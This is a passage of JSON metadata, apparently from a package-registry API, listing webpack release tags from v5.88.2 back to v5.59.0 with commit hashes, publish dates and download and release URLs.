purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"